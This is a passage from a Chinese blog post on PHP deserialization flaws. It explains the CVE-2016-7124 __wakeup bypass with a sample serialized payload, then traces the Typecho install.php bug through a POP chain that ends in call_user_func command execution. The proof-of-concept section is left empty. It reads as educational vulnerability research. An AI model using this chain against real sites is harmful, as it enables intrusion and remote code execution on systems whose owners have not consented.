<p>这个魔术函数的作用就是在反序列化的时候会执行函数里面的东西，在这题，，我们就算更改了<code>var</code>这个变量的值，wakeup还是会把他改回来。这时候就要用到一个CVE。<br>谷歌发现了CVE-2016-7124。简单来说就是当序列化字符串中，如果表示对象属性个数的值大于真实的属性个数时就会跳过<strong>wakeup的执行。参考<a href="https://bugs.php.net/bug.php?id=72663" target="_blank" rel="noopener">https://bugs.php.net/bug.php?id=72663</a>，某一种情况下，出错的对象不会被毁掉，会绕过</strong>wakeup函数、引用其他的魔术方法。<br>我们只要保证成员属性数目大于实际数目时可绕过wakeup方法，原来的序列化字符串是<code>O:6:&quot;object&quot;:1:{s:3:&quot;var&quot;;s:18:&quot;&lt;?php phpinfo() ?&gt;&quot;;}</code>把object后面的1更改为大于1的数字就可以了。。</p>
<p><img src="http://upload-images.jianshu.io/upload_images/5443560-5f8efd5ef26b8c09.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="image.png"></p>
<p><img src="http://upload-images.jianshu.io/upload_images/5443560-cfc12545ab7f151a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="image.png"></p>
<p>成功绕过</p>
<h2 id="0x07-经典案例-未完待续"><a href="#0x07-经典案例-未完待续" class="headerlink" title="0x07 经典案例(未完待续)"></a>0x07 经典案例(未完待续)</h2><p>1.typecho 反序列化漏洞复现</p>
<ul>
<li>版本:</li>
<li>下载地址:</li>
<li>漏洞分析:<br>来到install.php的232行<br><img src="http://upload-images.jianshu.io/upload_images/5443560-3bcc27f4dd42c0ae.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>这里存在一个反序列化漏洞。我们先来验证漏洞是否存在.反序列化参数最主要的是反序列化参数可控。这里的反序列化参数是<code>base64_decode(Typecho_Cookie::get(&#39;__typecho_config&#39;))</code><br>接下来，我们跟进<code>Typecho_Cookie::get</code>。<br>在Cookie.php中得到如下源码:<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">private static $_prefix = &apos;&apos;;</span><br><span class="line">...</span><br><span class="line">public static function get($key, $default = NULL)</span><br><span class="line">&#123;</span><br><span class="line">    $key = self::$_prefix . $key;</span><br><span class="line">    $value = isset($_COOKIE[$key]) ? $_COOKIE[$key] : (isset($_POST[$key]) ? $_POST[$key] : $default);</span><br><span class="line">    return is_array($value) ? $default : $value;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</li>
</ul>
<p>从上面代码可以看出，没有任何过滤，并且可以通过POST或者Cookie传输。<br>找到漏洞利用的位置，接下来我们考虑，这句话什么情况会被触发。往前看。58到64行<br><img src="http://upload-images.jianshu.io/upload_images/5443560-0065570ad023bfa1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>这里要三个条件都为真才会退出，只要传入GET参数finish,就可以绕过这个。接下来看65到78行。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">if (!empty($_GET) || !empty($_POST)) &#123;</span><br><span class="line">    if (empty($_SERVER[&apos;HTTP_REFERER&apos;])) &#123;</span><br><span class="line">        exit;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    $parts = parse_url($_SERVER[&apos;HTTP_REFERER&apos;]);</span><br><span class="line">    if (!empty($parts[&apos;port&apos;])) &#123;</span><br><span class="line">        $parts[&apos;host&apos;] = &quot;&#123;$parts[&apos;host&apos;]&#125;:&#123;$parts[&apos;port&apos;]&#125;&quot;;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    if (empty($parts[&apos;host&apos;]) || $_SERVER[&apos;HTTP_HOST&apos;] != $parts[&apos;host&apos;]) &#123;</span><br><span class="line">        exit;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>这里主要要求Referer不为空且必须为站内URL。<br>所以到这步先总结下,<br>只要满足传入GET参数finish，并设置referer为站内url。即可执行到漏洞利用点。然后反序列化的参数我们可以通过POST或者COOKIE传入。<br>下面，来完成最后一步，利用漏洞。<br>先找可能出触发的魔术函数。<br>在238行有<br><code>$db = new Typecho_Db($config[&#39;adapter&#39;], $config[&#39;prefix&#39;]);</code><br>所以我们构造的反序列化参数应该是一个数组,跟进<code>Typecho_Db</code>,在Db.php第120行，可以看到这行<br> <code>$adapterName = &#39;Typecho_Db_Adapter_&#39; . $adapterName;</code>。这里的话如果$adapterName是一个类，就会触发这个类的<code>__toString()</code>这个魔术函数，而$adapterName刚好就是我们传进的<code>$config[&#39;adapter&#39;]</code>。这里如果构造的反序列化是一个数组，其中adapter设置为某个类，就可以触发相应类的<strong>toString方法(详见上面魔术引号关于</strong>toString的介绍)。<br>下面全局寻找一个类，这个类是含有魔术函数<code>__toString()</code>且可被利用,<br><img src="http://upload-images.jianshu.io/upload_images/5443560-7375d79ef4cd9841.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="图片.png"><br>这里没有找到合适的，这时我们考虑POP chain<br>在var/Typecho/Feed.php的290行，有这样一句话。<br><code>$item[&#39;author&#39;]-&gt;screenName;</code><br>$item的值可以通过$_items获得，而$_items是类变量，可控，所以只要我们构造$item[‘author’]是一个类，这个类里面无法直接读取screenName，就会调用<strong>get()方法，参数是screenName。(详见上面魔术函数里面</strong>get的描述)</p>
<p>接下来全局查找具有 <code>__get()</code>且可以利用的函数。<br>在var/Typecho/requests.php第270行中有<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">public function __get($key)</span><br><span class="line">&#123;</span><br><span class="line">    return $this-&gt;get($key);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>跟进去，有<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">public function get($key, $default = NULL)</span><br><span class="line">&#123;</span><br><span class="line">    switch (true) &#123;</span><br><span class="line">        case isset($this-&gt;_params[$key]):</span><br><span class="line">            $value = $this-&gt;_params[$key];</span><br><span class="line">            break;</span><br><span class="line">        case isset(self::$_httpParams[$key]):</span><br><span class="line">            $value = self::$_httpParams[$key];</span><br><span class="line">            break;</span><br><span class="line">        default:</span><br><span class="line">            $value = $default;</span><br><span class="line">            break;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    $value = !is_array($value) &amp;&amp; strlen($value) &gt; 0 ? $value : $default;</span><br><span class="line">    return $this-&gt;_applyFilter($value);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>这里_params可控，我们构造为一个数组，key为<code>screenName</code>,value的值为$value,传进<code>_applyFilter</code>里面，我们跟进去。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">private function _applyFilter($value)</span><br><span class="line">&#123;</span><br><span class="line">    if ($this-&gt;_filter) &#123;</span><br><span class="line">        foreach ($this-&gt;_filter as $filter) &#123;</span><br><span class="line">            $value = is_array($value) ? array_map($filter, $value) :</span><br><span class="line">            call_user_func($filter, $value);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        $this-&gt;_filter = array();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    return $value;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>这里的<code>_filter</code>可控,$value可控，利用<code>call_user_func</code>可以造成命令执行漏洞</p>
<ul>
<li>POC</li>
</ul>
<p>2.SugarCRM v6.5.23反序列化漏洞复现</p>
  
	</div>
		<footer class="article-footer clearfix">
<div class="article-catetags">

<div class="article-categories">
  <span></span>
  <a class="article-category-link" href="/categories/漏洞研究/">漏洞研究</a>
</div>


  <div class="article-tags">
  
  <span></span> <a href="/tags/ctf/">ctf</a><a href="/tags/Web/">Web</a><a href="/tags/漏洞研究/">漏洞研究</a>
  </div>

</div>



	<div class="article-share" id="share">
	
	  <div data-url="http://www.daiker.com.cn/2017/12/22/php-object-injection/" data-title="php-object-injection | " data-tsina="5688081717" class="share clearfix">
	  </div>
	
	</div>


</footer>

   	       
	</article>
	
<nav class="article-nav clearfix">
 
 <div class="prev" >
 <a href="/2018/02/15/happyMoctf-ping一下好吗WP/" title="happyMoctf-ping一下好吗WP">
  <strong>上一篇：</strong><br/>
  <span>
  happyMoctf-ping一下好吗WP</span>
</a>
</div>


<div class="next">
<a href="/2017/07/09/php危险函数总结(随时补充)/"  title="PHP危险函数总结(随时补充)">
 <strong>下一篇：</strong><br/> 
 <span>PHP危险函数总结(随时补充)
</span>
</a>
</div>

</nav>

	
<section id="comments" class="comment">
	<div class="ds-thread" data-thread-key="2017/12/22/php-object-injection/" data-title="php-object-injection" data-url="http://www.daiker.com.cn/2017/12/22/php-object-injection/"></div>
</section>




</div>  
      <div class="openaside"><a class="navbutton" href="#" title="Show Sidebar"></a></div>

  <div id="toc" class="toc-aside">
  <strong class="toc-title">Contents</strong>
 
 <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00-序列化"><span class="toc-number">1.</span> <span class="toc-text"><a href="#0x00-&#x5E8F;&#x5217;&#x5316;" class="headerlink" title="0x00 &#x5E8F;&#x5217;&#x5316;"></a>0x00 &#x5E8F;&#x5217;&#x5316;</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-反序列化"><span class="toc-number">2.</span> <span class="toc-text"><a href="#0x01-&#x53CD;&#x5E8F;&#x5217;&#x5316;" class="headerlink" title="0x01 &#x53CD;&#x5E8F;&#x5217;&#x5316;"></a>0x01 &#x53CD;&#x5E8F;&#x5217;&#x5316;</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-魔术函数"><span class="toc-number">3.</span> <span class="toc-text"><a href="#0x02-&#x9B54;&#x672F;&#x51FD;&#x6570;" class="headerlink" title="0x02 &#x9B54;&#x672F;&#x51FD;&#x6570;"></a>0x02 &#x9B54;&#x672F;&#x51FD;&#x6570;</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-反序列化漏洞"><span class="toc-number">4.</span> <span class="toc-text"><a href="#0x03-&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x6F0F;&#x6D1E;" class="headerlink" title="0x03 &#x53CD;&#x5E8F;&#x5217;&#x5316;&#x6F0F;&#x6D1E;"></a>0x03 &#x53CD;&#x5E8F;&#x5217;&#x5316;&#x6F0F;&#x6D1E;</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-类变量的注意点"><span class="toc-number">5.</span> <span class="toc-text"><a href="#0x04-&#x7C7B;&#x53D8;&#x91CF;&#x7684;&#x6CE8;&#x610F;&#x70B9;" class="headerlink" title="0x04 &#x7C7B;&#x53D8;&#x91CF;&#x7684;&#x6CE8;&#x610F;&#x70B9;"></a>0x04 &#x7C7B;&#x53D8;&#x91CF;&#x7684;&#x6CE8;&#x610F;&#x70B9;</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x05-POP-Chain"><span class="toc-number">6.</span> <span class="toc-text"><a href="#0x05-POP-Chain" class="headerlink" title="0x05 POP Chain"></a>0x05 POP Chain</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x06-CVE-2016-7124"><span class="toc-number">7.</span> <span class="toc-text"><a href="#0x06-CVE-2016-7124" class="headerlink" title="0x06 CVE-2016-7124"></a>0x06 CVE-2016-7124</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x07-经典案例-未完待续"><span class="toc-number">8.</span> <span class="toc-text"><a href="#0x07-&#x7ECF;&#x5178;&#x6848;&#x4F8B;-&#x672A;&#x5B8C;&#x5F85;&#x7EED;" class="headerlink" title="0x07 &#x7ECF;&#x5178;&#x6848;&#x4F8B;(&#x672A;&#x5B8C;&#x5F85;&#x7EED;)"></a>0x07 &#x7ECF;&#x5178;&#x6848;&#x4F8B;(&#x672A;&#x5B8C;&#x5F85;&#x7EED;)</span></a></li></ol>
 
  </div>

<div id="asidepart">
<div class="closeaside"><a class="closebutton" href="#" title="Hide Sidebar"></a></div>
<aside class="clearfix">

  
<div class="github-card">
<p class="asidetitle">Github Card</p>
<div class="github-card" data-github="daikersec" data-theme="medium"></div>
<script type="text/javascript" src="//cdn.jsdelivr.net/github-cards/latest/widget.js" ></script>
</div>



  
<div class="categorieslist">
	<p class="asidetitle">Categories</p>
		<ul>
		
		  
			<li><a href="/categories/ctf/" title="ctf">ctf<sup>5</sup></a></li>
		  
		
		  
			<li><a href="/categories/注入/" title="注入">注入<sup>1</sup></a></li>
		  
		
		  
			<li><a href="/categories/渗透测试/" title="渗透测试">渗透测试<sup>1</sup></a></li>
		  
		
		  
			<li><a href="/categories/漏洞研究/" title="漏洞研究">漏洞研究<sup>1</sup></a></li>
		  
		
		</ul>
</div>


  
<div class="tagslist">
	<p class="asidetitle">Tags</p>
		<ul class="clearfix">
		
			
				<li><a href="/tags/Web/" title="Web">Web<sup>8</sup></a></li>
			
		
			
				<li><a href="/tags/ctf/" title="ctf">ctf<sup>6</sup></a></li>
			
		
			
				<li><a href="/tags/hackinglab/" title="hackinglab">hackinglab<sup>2</sup></a></li>
			
		
			
				<li><a href="/tags/漏洞研究/" title="漏洞研究">漏洞研究<sup>2</sup></a></li>
			
		
			
				<li><a href="/tags/代码审计/" title="代码审计">代码审计<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/php/" title="php">php<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/注入/" title="注入">注入<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/渗透/" title="渗透">渗透<sup>1</sup></a></li>
			
		
			
				<li><a href="/tags/提权/" title="提权">提权<sup>1</sup></a></li>
			
		
		</ul>
</div>


  
  <div class="archiveslist">
    <p class="asidetitle"><a href="/archives">Archives</a></p>
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/02/">February 2018</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/12/">December 2017</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/07/">July 2017</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/05/">May 2017</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/04/">April 2017</a><span class="archive-list-count">3</span></li></ul>
  </div>


  <div class="rsspart">
	<a href="/atom.xml" target="_blank" title="rss">RSS</a>
</div>

</aside>
</div>
    </div>
    <footer><div id="footer" >
	
	<div class="line">
		<span></span>
		<div class="author"></div>
	</div>
	
	
	<div class="social-font" class="clearfix">
		
		<a href="http://weibo.com/daikersec" target="_blank" class="icon-weibo" title="微博"></a>
		
		
		<a href="https://github.com/daikersec" target="_blank" class="icon-github" title="github"></a>
		
		
		
		<a href="https://twitter.com/daikersec" target="_blank" class="icon-twitter" title="twitter"></a>
		
		
		
		
		
		
		
		<a href="mailto:daikersec@gmail.com" target="_blank" class="icon-email" title="Email Me"></a>
		
	</div>
			
		

		<p class="copyright">
		Powered by <a href="http://hexo.io" target="_blank" title="hexo">hexo</a> and Theme by <a href="https://github.com/wuchong/jacman" target="_blank" title="Jacman">Jacman</a> © 2018 
		
		<a href="/about" target="_blank" title="daiker">daiker</a>
		
		
		</p>
</div>
</footer>
    <script src="/js/jquery-2.0.3.min.js"></script>
<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/jquery.qrcode-0.12.0.min.js"></script>

<script type="text/javascript">
$(document).ready(function(){ 
  $('.navbar').click(function(){
    $('header nav').toggleClass('shownav');
  });
  var myWidth = 0;
  function getSize(){
    if( typeof( window.innerWidth ) == 'number' ) {
      myWidth = window.innerWidth;
    } else if( document.documentElement && document.documentElement.clientWidth) {
      myWidth = document.documentElement.clientWidth;
    };
  };
  var m = $('#main'),
      a = $('#asidepart'),
      c = $('.closeaside'),
      o = $('.openaside');
  c.click(function(){
    a.addClass('fadeOut').css('display', 'none');
    o.css('display', 'block').addClass('fadeIn');
    m.addClass('moveMain');
  });
  o.click(function(){
    o.css('display', 'none').removeClass('beforeFadeIn');
    a.css('display', 'block').removeClass('fadeOut').addClass('fadeIn');      
    m.removeClass('moveMain');
  });
  $(window).scroll(function(){
    o.css("top",Math.max(80,260-$(this).scrollTop()));
  });
  
  $(window).resize(function(){
    getSize(); 
    if (myWidth >= 1024) {
      $('header nav').removeClass('shownav');
    }else{
      m.removeClass('moveMain');
      a.css('display', 'block').removeClass('fadeOut');
      o.css('display', 'none');
      
      $('#toc.toc-aside').css('display', 'none');
        
    }
  });
});
</script>

<script type="text/javascript">
$(document).ready(function(){ 
  var ai = $('.article-content>iframe'),
      ae = $('.article-content>embed'),
      t  = $('#toc'),
      ta = $('#toc.toc-aside'),
      o  = $('.openaside'),
      c  = $('.closeaside');
  if(ai.length>0){
    ai.wrap('<div class="video-container" />');
  };
  if(ae.length>0){
   ae.wrap('<div class="video-container" />');
  };
  c.click(function(){
    ta.css('display', 'block').addClass('fadeIn');
  });
  o.click(function(){
    ta.css('display', 'none');
  });
  $(window).scroll(function(){
    ta.css("top",Math.max(140,320-$(this).scrollTop()));
  });
});
</script>


<script type="text/javascript">
$(document).ready(function(){ 
  var $this = $('.share'),
      url = $this.attr('data-url'),
      encodedUrl = encodeURIComponent(url),
      title = $this.attr('data-title'),
      tsina = $this.attr('data-tsina'),
      description = $this.attr('description');
  var html = [
  '<div class="hoverqrcode clearfix"></div>',
  '<a class="overlay" id="qrcode"></a>',
  '<a href="https://www.facebook.com/sharer.php?u=' + encodedUrl + '" class="article-share-facebook" target="_blank" title="Facebook"></a>',
  '<a href="https://twitter.com/intent/tweet?url=' + encodedUrl + '" class="article-share-twitter" target="_blank" title="Twitter"></a>',
  '<a href="#qrcode" class="article-share-qrcode" title="微信"></a>',
  '<a href="http://widget.renren.com/dialog/share?resourceUrl=' + encodedUrl + '&srcUrl=' + encodedUrl + '&title=' + title +'" class="article-share-renren" target="_blank" title="人人"></a>',
  '<a href="http://service.weibo.com/share/share.php?title='+title+'&url='+encodedUrl +'&ralateUid='+ tsina +'&searchPic=true&style=number' +'" class="article-share-weibo" target="_blank" title="微博"></a>',
  '<span title="Share to"></span>'
  ].join('');
  $this.append(html);

  $('.hoverqrcode').hide();

  var myWidth = 0;
  function updatehoverqrcode(){
    if( typeof( window.innerWidth ) == 'number' ) {
      myWidth = window.innerWidth;
    } else if( document.documentElement && document.documentElement.clientWidth) {
      myWidth = document.documentElement.clientWidth;
    };
    var qrsize = myWidth > 1024 ? 200:100;
    var options = {render: 'image', size: qrsize, fill: '#2ca6cb', text: url, radius: 0.5, quiet: 1};
    var p = $('.article-share-qrcode').position();
    $('.hoverqrcode').empty().css('width', qrsize).css('height', qrsize)
                          .css('left', p.left-qrsize/2+20).css('top', p.top-qrsize-10)
                          .qrcode(options);
  };
  $(window).resize(function(){
    $('.hoverqrcode').hide();
  });
  $('.article-share-qrcode').click(function(){
    updatehoverqrcode();
    $('.hoverqrcode').toggle();
  });
  $('.article-share-qrcode').hover(function(){}, function(){
      $('.hoverqrcode').hide();
  });
});   
</script>



<script type="text/javascript">
  var duoshuoQuery = {short_name:"嘟嘟MD"};
  (function() {
    var ds = document.createElement('script');
    ds.type = 'text/javascript';ds.async = true;
    ds.src = '//static.duoshuo.com/embed.js';
    ds.charset = 'UTF-8';
    (document.getElementsByTagName('head')[0] 
    || document.getElementsByTagName('body')[0]).appendChild(ds);
  })();
</script> 









<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
$(document).ready(function(){ 
  $('.article-content').each(function(i){
    $(this).find('img').each(function(){
      if ($(this).parent().hasClass('fancybox')) return;
      var alt = this.alt;
      if (alt) $(this).after('<span class="caption">' + alt + '</span>');
      $(this).wrap('<a href="' + this.src + '" title="' + alt + '" class="fancybox"></a>');
    });
    $(this).find('.fancybox').each(function(){
      $(this).attr('rel', 'article' + i);
    });
  });
  if($.fancybox){
    $('.fancybox').fancybox();
  }
}); 
</script>



<!-- Analytics Begin -->



<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "//hm.baidu.com/hm.js?2a1c7e2856fa901812e41edbfcef616e";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>



<!-- Analytics End -->

<!-- Totop Begin -->

	<div id="totop">
	<a title="Back to Top"><img src="/img/scrollup.png"/></a>
	</div>
	<script src="/js/totop.js"></script>

<!-- Totop End -->

<!-- MathJax Begin -->
<!-- mathjax config similar to math.stackexchange -->

<script type="text/x-mathjax-config">
  MathJax.Hub.Config({
    tex2jax: {
      inlineMath: [ ['$','$'], ["\\(","\\)"] ],
      processEscapes: true
    }
  });
</script>

<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
      tex2jax: {
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
      }
    });
</script>

<script type="text/x-mathjax-config">
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for(i=0; i < all.length; i += 1) {
            all[i].SourceElement().parentNode.className += ' has-jax';
        }
    });
</script>

<script type="text/javascript" src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
</script>


<!-- MathJax End -->

<!-- Tiny_search Begin -->

<!-- Tiny_search End -->

  </body>
</html>
